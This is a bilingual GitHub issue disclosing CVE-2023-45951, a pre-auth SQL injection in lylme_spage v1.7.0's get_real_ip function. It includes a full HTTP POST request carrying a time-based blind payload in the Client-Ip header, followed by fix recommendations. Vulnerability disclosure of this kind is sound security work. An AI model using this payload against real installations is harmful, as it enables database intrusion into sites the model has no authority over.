Headline
CVE-2023-45951: [vulnerability] Pre-auth SQL Injection Vulnerability in function.php (function.php 存在前台SQL注入漏洞) · Issue #32 · LyLme/lylme_spage
lylme_spage v1.7.0 was discovered to contain a SQL injection vulnerability via the $userip parameter at function.php.
Pre-auth SQL Injection Vulnerability in function.php****1.Steps to reproduce (复现步骤)
1.Access http://host/apply/index.php?submit=post via POST method and carry the follw data, the injection point is Client-Ip field within HTTP Header.
1.根据下图所示构造请求数据包,漏洞存在于 HTTP Header 的 Client-Ip 字段。
POST /apply/index.php?submit=post HTTP/1.1 Host: host User-Agent: python-requests/2.28.2 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded; charset=UTF-8 cookie: PHPSESSID=;XDEBUG_SESSION=PHPSTORM Client-Ip: 0’>if(1,sleep(10),2)>’ Content-Length: 70
url=http%3A%2F%2Fqq.comcAMMVjjb1OL&name=test&group_id=1&icon=&authcode=
payload: Client-Ip: 0’>if(1,sleep(10),2)>’
2.As shown aboved, the payload can delay response elapsed time by more than 10 seconds
如上图所示,载荷可以使响应时间延迟10s以上。
2.Expected behaviour (预期行为)
get_real_ip function is meant to get an valid real client ip.
get_real_ip 函数的本意是获取一个合法的真实用户的ip地址。
And then, the $userip will be part of the $sql variable value which will be execute by $DB->query($sql).
然后,$userip 将成为$sql变量值的一部分,由 $DB->query($sql) 执行。
3.Actual behaviour (实际行为)
However, step in the vuln function get_real_ip , $real_ip can be passed unrestricted malicious SQL payload by Client-Ip: field.
但是,在漏洞函数 get_real_ip 中,$real_ip 可以通过 Client-Ip: 字段传递不受限制的恶意 SQL 有效载荷。
so the attack payload Client-Ip: 0’>if(1,sleep(10),2)>’ can take effect and executed。
因此攻击载荷 Client-Ip: 0’>if(1,sleep(10),2)>’ 能够生效并被执行。
4.Affected Version (受影响的版本)
this SQL Vuln Affect latest Version: lylme_spagev1.7.0
这个SQL注入漏洞影响最新版本:六零导航页 v1.7.0
5.fixes Recommendations (修复建议)
For fix this vuln, Here is my advices:
1.Check if the format of the ip satisfies the ipv4 rfc in get_real_ip
2.Handle the result of ip, like this strip_tags(daddslashes(get_real_ip()));
3.Delete this variable which seems useless
为了修复这个漏洞,我有以下建议:
1.在 get_real_ip 中检查 IP 的格式是否符合 ipv4 rfc 标准
2.像这样处理 ip 的结果 strip_tags(daddslashes(get_real_ip()));
3.删除这个看似无用的变量